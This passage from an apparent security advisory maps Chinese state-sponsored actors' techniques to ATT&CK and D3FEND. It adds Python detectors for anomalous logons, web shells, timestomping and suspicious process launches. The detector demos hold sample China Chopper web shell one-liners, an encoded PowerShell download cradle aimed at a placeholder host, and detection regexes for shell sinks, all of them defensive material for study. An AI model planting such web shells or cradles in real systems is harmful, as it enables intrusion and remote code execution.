 * Look for suspicious account behavior across systems that share accounts, whether user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, or accounts logged in at odd times or outside of business hours).
 * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
 * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
 * User Behavior Analysis
   * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
   * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)]
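
Several of the checks in the Valid Accounts and Modify Authentication Process rows above are authentication event thresholding and correlation: one account on many hosts at once, many accounts on one host, logons at odd hours, and interactive sessions for users who are neither on site nor on the VPN. The following Python script is an added example, not code from the advisory, that runs those four checks over constructed logon records. The thresholds, business hours, service-account naming convention, and the on-site/VPN presence sets are assumptions to tune against your own baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed site baseline (placeholders to tune): business hours, the correlation window,
# and how many concurrent hosts per account / accounts per host are considered normal.
BUSINESS_HOURS = range(7, 20)            # 07:00-19:59 local time
WINDOW = timedelta(minutes=10)
MAX_HOSTS_PER_ACCOUNT = 3
MAX_ACCOUNTS_PER_HOST = 5
INTERACTIVE_TYPES = {2, 10, 11}          # Windows logon types: console, RemoteInteractive, cached interactive
SERVICE_PREFIX = "svc-"                  # naming convention assumed for service accounts


def parse_logons(text):
    """Parse 'time user host logon_type src_ip' lines (constructed format) into time-sorted dicts."""
    events = []
    for line in text.splitlines():
        if line.strip():
            t, user, host, ltype, src = line.split()
            events.append({"time": datetime.fromisoformat(t), "user": user, "host": host,
                           "logon_type": int(ltype), "src_ip": src})
    return sorted(events, key=lambda e: e["time"])


def exceeding_within_window(events, group_key, count_key, limit, window=WINDOW):
    """Generic thresholding: for each group_key value, the largest set of distinct count_key values
    seen inside any trailing `window`; only groups whose set exceeds `limit` are returned."""
    groups = defaultdict(list)
    for e in events:
        groups[e[group_key]].append(e)
    flagged = {}
    for key, evs in groups.items():
        for i, anchor in enumerate(evs):
            seen = {x[count_key] for x in evs[: i + 1] if anchor["time"] - x["time"] <= window}
            if len(seen) > limit and len(seen) > len(flagged.get(key, ())):
                flagged[key] = seen
    return flagged


def concurrent_hosts(events):
    """One account with sessions on more hosts than MAX_HOSTS_PER_ACCOUNT inside WINDOW."""
    return exceeding_within_window(events, "user", "host", MAX_HOSTS_PER_ACCOUNT)


def crowded_hosts(events):
    """One host with more distinct accounts than MAX_ACCOUNTS_PER_HOST inside WINDOW."""
    return exceeding_within_window(events, "host", "user", MAX_ACCOUNTS_PER_HOST)


def off_hours(events):
    """Human (non-service) accounts logging on outside BUSINESS_HOURS."""
    return [(e["user"], e["host"], e["time"].isoformat()) for e in events
            if e["time"].hour not in BUSINESS_HOURS and not e["user"].startswith(SERVICE_PREFIX)]


def missing_presence(events, onsite, vpn_users):
    """Interactive logons by users who are neither badged on site nor on the VPN: the cross-system
    correlation the row above recommends."""
    return [(e["user"], e["host"]) for e in events
            if e["logon_type"] in INTERACTIVE_TYPES and e["user"] not in onsite and e["user"] not in vpn_users]


def analyze_logons(text, onsite, vpn_users):
    events = parse_logons(text)
    return {"concurrent_hosts": concurrent_hosts(events), "crowded_hosts": crowded_hosts(events),
            "off_hours": off_hours(events), "missing_presence": missing_presence(events, onsite, vpn_users)}


# Constructed records: alice's account fans out to four hosts in under three minutes, bob logs in
# over RDP at 02:17 with no badge or VPN record, svc-backup and carol behave normally.
SAMPLE_LOGONS = """\
2021-07-19T09:02:10 alice WS-101 2 10.1.1.20
2021-07-19T09:03:30 alice FS-01 3 10.1.1.20
2021-07-19T09:04:02 alice SQL-02 3 10.1.1.20
2021-07-19T09:04:40 alice OWA-1 3 10.1.1.20
2021-07-19T02:17:55 bob WS-207 10 203.0.113.8
2021-07-19T10:15:00 svc-backup FS-01 5 10.1.2.5
2021-07-19T11:00:00 carol WS-301 2 10.1.1.31
"""
ONSITE_TODAY = {"alice", "carol"}      # from the badge system (constructed)
VPN_USERS_TODAY = set()                # from the VPN concentrator (constructed)

if __name__ == "__main__":
    for check, result in analyze_logons(SAMPLE_LOGONS, ONSITE_TODAY, VPN_USERS_TODAY).items():
        print(check, result)
```

The fan-out check is deliberately not tied to logon type: a compromised domain account used for lateral movement shows up as network logons (type 3) on file and mail servers, exactly the OWA and portal access the Valid Accounts row describes.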

Technique: Server Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]

 * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.

Detection and Mitigation Recommendations:

 * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
 * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
 * Perform integrity checks on critical servers to identify and investigate unexpected changes.
 * Have application developers sign their code using digital signatures to verify their identity.
 * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
 * Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts, and control creation and execution of files in particular directories.
 * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction between the two, and logging traffic between them, provides a method to identify possible malicious activity.
 * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
 * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
 * Establish, and back up offline, a "known good" version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
 * Employ user input validation to restrict exploitation of vulnerabilities.
 * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
 * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.

Defensive Tactics and Techniques:

Detect:

 * Network Traffic Analysis
   * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
   * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]
 * Process Analysis
   * Process Spawn Analysis
     * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

Isolate:

 * Network Isolation
   * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

Technique: Create or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]

 * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.

**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].

Detection and Mitigation Recommendations:

 * Only allow authorized administrators to make service changes and modify service configurations.
 * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
 * Monitor WMI and PowerShell for service modifications.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
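
Two of the web shell recommendations above, integrity checks of critical servers against a known-good snapshot and searching files for predictable web shell syntax, combine naturally into one host-side check. The Python below is an added example, not code from the advisory or from any vendor: it snapshots a web root by SHA-256, diffs the current tree against that snapshot, and runs a small set of content rules (China Chopper style `eval(Request.Item[...])` and `@eval($_POST[...])` one-liners plus generic request-parameter-to-exec sinks) over every added or modified server-side script. `demo()` builds a throwaway web root in a temporary directory with constructed files to exercise the checks; the rule set is illustrative, not exhaustive, and the snapshot is what the "known good" copy kept offline would be compared against.

```python
import hashlib
import os
import re
import tempfile

# Content rules for common web shell idioms: China Chopper style one-liners and generic
# "request parameter straight into a code/command sink" patterns. Illustrative, not exhaustive.
SHELL_RULES = {
    "china_chopper_aspx": re.compile(r"eval\s*\(\s*Request\.Item\[", re.I),
    "china_chopper_php": re.compile(r"@?eval\s*\(\s*\$_(POST|GET|REQUEST)\[", re.I),
    "php_eval_b64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "php_exec_from_request": re.compile(r"\b(system|shell_exec|passthru|exec)\s*\(\s*\$_(POST|GET|REQUEST)\[", re.I),
    "jsp_runtime_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(", re.I),
}
SERVER_SCRIPT_EXTENSIONS = (".php", ".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx", ".cfm")


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Relative path -> SHA-256 for every file under root: the 'known good' baseline to keep offline."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            snap[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return snap


def diff_snapshot(root, known_good):
    current = snapshot(root)
    return {"added": sorted(set(current) - set(known_good)),
            "modified": sorted(p for p in current if p in known_good and current[p] != known_good[p]),
            "removed": sorted(set(known_good) - set(current))}


def scan_content(path):
    """Names of the SHELL_RULES that match the file (decoded permissively so odd encodings do not abort the scan)."""
    with open(path, "rb") as f:
        text = f.read().decode("utf-8", errors="replace")
    return [name for name, rule in SHELL_RULES.items() if rule.search(text)]


def check_webroot(root, known_good):
    """Integrity diff against the baseline, plus content rules on every added or modified server-side script."""
    diff = diff_snapshot(root, known_good)
    suspicious = {}
    for rel in diff["added"] + diff["modified"]:
        if rel.lower().endswith(SERVER_SCRIPT_EXTENSIONS):
            hits = scan_content(os.path.join(root, rel))
            if hits:
                suspicious[rel] = hits
    return {"diff": diff, "suspicious": suspicious}


def demo():
    """Build a throwaway web root with constructed content, baseline it, then simulate post-compromise changes."""
    root = tempfile.mkdtemp()

    def write(rel, text):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(text)

    write("index.php", "<?php echo 'hello'; ?>")
    write("img/logo.txt", "placeholder")
    known_good = snapshot(root)
    # Constructed changes: a dropped China Chopper style page, a trojaned existing page, a deleted asset.
    write("uploads/help.aspx", '<% eval(Request.Item["pw"]) %>')
    write("index.php", "<?php echo 'hello'; @eval($_POST['x']); ?>")
    os.remove(os.path.join(root, "img/logo.txt"))
    return check_webroot(root, known_good)


if __name__ == "__main__":
    print(demo())
```

Only added or modified scripts are content-scanned, so the integrity diff does the heavy lifting and the rules only have to be good enough to triage a short list; a page that was trojaned in place (the modified `index.php` in the demo) is caught the same way as a newly dropped file.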

### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]

_Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations_

Technique: Domain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]

 * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

Detection and Mitigation Recommendations:

 * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
 * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.
 * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.

Defensive Tactics and Techniques:

Detect:

 * Network Traffic Analysis
   * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]
 * Platform Monitoring
   * Operating System Monitoring
     * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]

Technique: Process Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]

 * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]
 * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed:

 * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.
 * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`).

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

Detection and Mitigation Recommendations:

 * Use endpoint protection software to block process injection based on the behavior of the injecting process.
 * Monitor DLL/Portable Executable (PE) file events, specifically the creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
 * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory`, and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
 * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only the users who actually need them; upgrade Windows to at least version 8.1 or 10; run the Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; and harden the Local Security Authority (LSA) to prevent code injection.

Defensive Tactics and Techniques:

Isolate:

 * Execution Isolation
   * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
   * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]

### Tactics: _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]

_Table VII: Chinese state-sponsored cyber actors’ Defense Evasion TTPs with detection and mitigation recommendations_

Technique: Deobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.

Detection and Mitigation Recommendations:

 * Monitor the execution file paths and command-line arguments of common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
 * Consider blocking, disabling, or monitoring use of 7-Zip.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]

Technique: Hide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed using benign executables that relied on DLL load-order hijacking to activate the malware installation process.

Detection and Mitigation Recommendations:

 * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
 * Monitor event and authentication logs for records of hidden artifacts being used.
 * Monitor the file system and shell commands for hidden attribute usage.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

Technique: Indicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. Several of the files the cyber actors target are timestomped, so that they show different times from when those files were actually created or used.

Detection and Mitigation Recommendations:

 * Make the environment variables associated with command history read-only to ensure that the history is preserved.
 * Recognize timestomping by monitoring the contents of important directories and the attributes of the files.
 * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.
 * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within the enterprise network and that an adversary could introduce.
 * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise, and inconsistencies between file timestamps and previous handles opened to them can serve as a detection rule.

Defensive Tactics and Techniques:

Detect:

 * Platform Monitoring
   * Operating System Monitoring
     * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
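
The timestomping recommendation in the Indicator Removal row above (recognize timestomping by monitoring file attributes) can be made concrete with NTFS metadata: the $STANDARD_INFORMATION ($SI) timestamps are what `SetFileTime`-style tools rewrite, while the $FILE_NAME ($FN) timestamps are maintained by the kernel and are not settable through that API. The Python below is an added example, not from the advisory, that applies the usual heuristics to constructed MFT-parser output: $SI earlier than $FN, $SI values with no sub-second component, and a file that claims to predate its own parent directory. These are indicators to investigate rather than proof; files extracted from FAT volumes or ZIP archives can also legitimately carry whole-second timestamps, which is why the script reports reasons rather than a verdict.

```python
from datetime import datetime

# Constructed MFT-parser output: type|path|si_created|si_modified|fn_created|fn_modified
# ($SI = $STANDARD_INFORMATION, $FN = $FILE_NAME; microsecond precision as most parsers export).
SAMPLE_MFT = r"""
dir|C:\Windows\System32\drivers|2019-03-19T04:37:22.114273|2021-06-08T13:02:11.887120|2019-03-19T04:37:22.114273|2019-03-19T04:37:22.114273
file|C:\Windows\System32\drivers\netio.sys|2021-06-08T13:02:11.887120|2021-06-08T13:02:11.887120|2021-06-08T13:02:11.887120|2021-06-08T13:02:11.887120
file|C:\Windows\System32\drivers\wmpnet.sys|2009-07-14T01:39:14.000000|2009-07-14T01:39:14.000000|2021-07-18T22:41:05.331902|2021-07-18T22:41:05.331902
file|C:\Users\Public\report.docx|2021-07-01T09:00:00.250011|2021-07-02T16:12:43.918200|2021-07-01T09:00:00.250011|2021-07-01T09:00:00.250011
"""


def parse_mft_rows(text):
    rows = []
    for line in text.strip().splitlines():
        kind, path, si_c, si_m, fn_c, fn_m = line.split("|")
        rows.append({"type": kind, "path": path,
                     "si_created": datetime.fromisoformat(si_c), "si_modified": datetime.fromisoformat(si_m),
                     "fn_created": datetime.fromisoformat(fn_c), "fn_modified": datetime.fromisoformat(fn_m)})
    return rows


def parent_dir(path):
    return path.rsplit("\\", 1)[0]


def timestomp_indicators(rec, dir_created):
    """Heuristics on one record; dir_created maps directory path -> its $SI creation time."""
    reasons = []
    if rec["si_created"] < rec["fn_created"]:
        reasons.append("$SI created precedes $FN created ($FN is kernel-maintained, not settable via SetFileTime)")
    if rec["si_modified"] < rec["fn_modified"]:
        reasons.append("$SI modified precedes $FN modified")
    if rec["si_created"].microsecond == 0 and rec["si_modified"].microsecond == 0:
        reasons.append("$SI timestamps are whole seconds (common timestomping artifact; also seen on FAT/ZIP extracts)")
    parent = parent_dir(rec["path"])
    if parent in dir_created and rec["si_created"] < dir_created[parent]:
        reasons.append(f"claims to predate its parent directory {parent}")
    return reasons


def find_timestomped(text):
    """{path: reasons} for every record with at least one indicator."""
    rows = parse_mft_rows(text)
    dir_created = {r["path"]: r["si_created"] for r in rows if r["type"] == "dir"}
    result = {}
    for r in rows:
        reasons = timestomp_indicators(r, dir_created)
        if reasons:
            result[r["path"]] = reasons
    return result


if __name__ == "__main__":
    for path, why in find_timestomped(SAMPLE_MFT).items():
        print(path)
        for w in why:
            print("  -", w)
```

In the constructed sample, `wmpnet.sys` has been back-dated to 2009 to blend in with the other drivers, but its $FN timestamps and the creation time of its parent directory both say it arrived in 2021; the untouched `netio.sys` next to it produces no indicators.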

Technique: Obfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed Base64-encoding files and command strings to evade security measures.

Detection and Mitigation Recommendations: Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after they have been processed/interpreted.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Technique: Signed Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]

 * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]
 * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed using Microsoft-signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.

Detection and Mitigation Recommendations: Monitor processes for the execution of known proxy binaries (e.g., `rundll32.exe`) and look for anomalous activity that does not follow the historically good arguments and loaded DLLs associated with invocations of the binary.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
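
The rows for command interpreters, Base64-encoded commands, 7-Zip, web shells (process lineage), and signed proxy binaries all reduce to inspecting process creation events: which binary ran, who its parent was, and what the command line says once any encoding is undone. The Python below is an added example, not code from the advisory and not AMSI, that applies those checks to constructed Sysmon-style process creation records: it decodes PowerShell `-EncodedCommand` payloads (UTF-16LE text, base64 encoded) so the real command can be matched, compares `rundll32` DLL/export pairs against an assumed baseline of historically good invocations and flags DLLs loaded from outside the system directories or exports called by ordinal, flags archivers run from non-standard paths or with a password switch, and flags shells spawned by a web server worker. The baseline set, the worker and archiver name lists, and the sample events are constructed.

```python
import base64
import json
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumed baseline of (dll, export) pairs seen in normal rundll32 use on the fleet (constructed).
KNOWN_RUNDLL32 = {("shell32.dll", "control_rundll"), ("shell32.dll", "shellexec_rundll"),
                  ("user32.dll", "lockworkstation"), ("printui.dll", "printuientry")}
WEB_WORKERS = ("w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
ARCHIVERS = {"7z.exe", "7za.exe", "7zg.exe", "winrar.exe", "rar.exe", "unrar.exe"}
ARCHIVER_HOMES = ("c:\\program files\\", "c:\\program files (x86)\\")
CRADLE = re.compile(r"(downloadstring|downloadfile|net\.webclient|invoke-expression|\biex\b|frombase64string|invoke-webrequest)", re.I)
RUNDLL_ARGS = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+?)"?\s*,\s*([^\s,]+)', re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_encoded(cmdline):
    """Payload of -EncodedCommand; PowerShell accepts -e, -ec and any unambiguous prefix of the switch."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and flag and (flag == "ec" or "encodedcommand".startswith(flag)):
            return tokens[i + 1].strip("\"'")
    return None


def decode_powershell(b64):
    """-EncodedCommand payloads are UTF-16LE text, base64 encoded; None if the payload is not that."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def b64_powershell(command):
    """Encode a command the way PowerShell expects; used only to build the constructed sample."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def rundll32_findings(cmdline):
    m = RUNDLL_ARGS.search(cmdline)
    if not m:
        return ["rundll32 without a recognizable dll,entry argument"]
    dll, entry = m.group(1).strip(), m.group(2).strip()
    reasons = []
    if "\\" in dll and not dll.lower().startswith(SYSTEM_DIRS):
        reasons.append(f"DLL outside the system directories: {dll}")
    if entry.startswith("#"):
        reasons.append(f"export called by ordinal ({entry}) rather than by name")
    if (basename(dll), entry.lower()) not in KNOWN_RUNDLL32:
        reasons.append(f"dll/export pair not in baseline: {basename(dll)},{entry}")
    if re.search(r"javascript:|https?://", cmdline, re.I):
        reasons.append("script or URL passed to rundll32")
    return reasons


def analyze_process(ev):
    """Reasons a process creation record looks anomalous (empty list = nothing stood out)."""
    image, parent, cl = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    reasons = []
    if image in SHELLS and parent.startswith(WEB_WORKERS):
        reasons.append(f"web server worker {parent} spawned {image} (web shell lineage)")
    if image in ("powershell.exe", "pwsh.exe"):
        payload = extract_encoded(cl)
        if payload is not None:
            decoded = decode_powershell(payload)
            if decoded is None:
                reasons.append("-EncodedCommand payload is not valid UTF-16LE base64")
            else:
                reasons.append(f"encoded command decodes to: {decoded.strip()}")
                if CRADLE.search(decoded):
                    reasons.append("decoded command contains a download/execute cradle")
    if image == "rundll32.exe":
        reasons.extend(rundll32_findings(cl))
    if image in ARCHIVERS:
        if not ev["Image"].lower().startswith(ARCHIVER_HOMES):
            reasons.append(f"archiver run from a non-standard path: {ev['Image']}")
        if re.search(r"(?:^|\s)-p\S*", cl):
            reasons.append("password-protected archive handled on the command line")
    return reasons


def scan_process_events(lines):
    """{ProcessId: reasons} for every flagged record in JSON-lines input (Sysmon Event ID 1 field names)."""
    flagged = {}
    for line in lines:
        ev = json.loads(line)
        reasons = analyze_process(ev)
        if reasons:
            flagged[ev["ProcessId"]] = reasons
    return flagged


# Constructed records using Sysmon Event ID 1 field names.
SAMPLE_PROCESS_EVENTS = [json.dumps(e) for e in (
    {"ProcessId": 1001, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL intl.cpl"},
    {"ProcessId": 1002, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\upd.dll,#1"},
    {"ProcessId": 1003, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + b64_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    {"ProcessId": 1004, "Image": r"C:\Users\jdoe\AppData\Local\Temp\7za.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"7za.exe x tools.7z -pSecret -oC:\Users\Public"},
    {"ProcessId": 1005, "Image": r"C:\Program Files\7-Zip\7z.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" x report.zip'},
)]

if __name__ == "__main__":
    for pid, why in scan_process_events(SAMPLE_PROCESS_EVENTS).items():
        print(pid, "->", "; ".join(why))
```

The rundll32 baseline is the part that needs real data: collect the (DLL, export) pairs your fleet actually produces over a few weeks, and only then treat anything outside that set as worth a look, which is what the "historically good arguments" recommendation above amounts to.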

### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]

_Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations_

Technique: Exploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.

Detection and Mitigation Recommendations:

 * Update and patch software regularly.
 * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.

Defensive Tactics and Techniques:

Harden:

 * Platform Hardening
   * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
 * Credential Hardening
   * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]

Technique: OS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)]

 * LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)]
 * NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed targeting the LSASS process or the Active Directory database (`NTDS.DIT`) for credential dumping.

Detection and Mitigation Recommendations:

 * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy `NTDS.DIT`.
 * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
 * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.
 * Consider disabling or restricting NTLM.
 * Consider disabling `WDigest` authentication.
 * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).
 * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and has hardware and firmware requirements.
 * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.

Defensive Tactics and Techniques:

Harden:

 * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]

Detect:

 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
